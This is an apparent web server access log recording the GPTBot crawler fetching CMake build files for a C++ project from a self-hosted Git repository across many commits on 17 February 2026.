"/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=source" [Client 74.7.227.38] [Length 11323] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:18:10:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:18:10:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=source" [Client 74.7.227.38] [Length 15275] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:18:10:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:18:10:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11232] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:18:10:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=source" [Client 74.7.227.38] [Length 16062] [Gzip 5.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:18:10:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11081] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:18:10:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11084] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:18:10:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11085] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:18:10:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=rendered" [Client 74.7.227.38] [Length 11095] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:18:10:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11234] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:18:10:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11088] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:18:10:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11184] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:18:10:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=source" [Client 74.7.227.38] [Length 11505] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:18:10:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=source" [Client 74.7.227.38] [Length 15276] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:18:10:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=source" [Client 74.7.227.38] [Length 24301] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:18:10:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=source" [Client 74.7.227.38] [Length 11507] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:18:10:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=source" [Client 74.7.227.38] [Length 11511] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:18:10:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:18:10:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11087] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:18:10:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=rendered" [Client 74.7.227.38] [Length 11101] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:18:10:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11125] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:18:10:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=source" [Client 74.7.227.38] [Length 11504] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:18:10:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11087] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:18:10:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11087] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:18:10:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=source" [Client 74.7.227.38] [Length 11325] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:18:10:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=source" [Client 74.7.227.38] [Length 11235] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:18:10:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=source" [Client 74.7.227.38] [Length 11504] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:18:10:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11233] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:18:10:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11202] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:18:10:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=source" [Client 74.7.227.38] [Length 11233] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:18:10:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11088] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:18:10:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11619] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:18:10:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=rendered" [Client 74.7.227.38] [Length 11093] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:18:10:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=source" [Client 74.7.227.38] [Length 24299] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:18:10:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=source" [Client 74.7.227.38] [Length 11233] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:18:10:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11184] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:18:10:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11123] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:18:10:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11184] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:18:10:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11200] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:18:10:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11082] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:18:10:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11199] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:18:10:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=source" [Client 74.7.227.38] [Length 11232] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:18:10:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11201] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:18:10:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11123] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:18:11:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15124] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 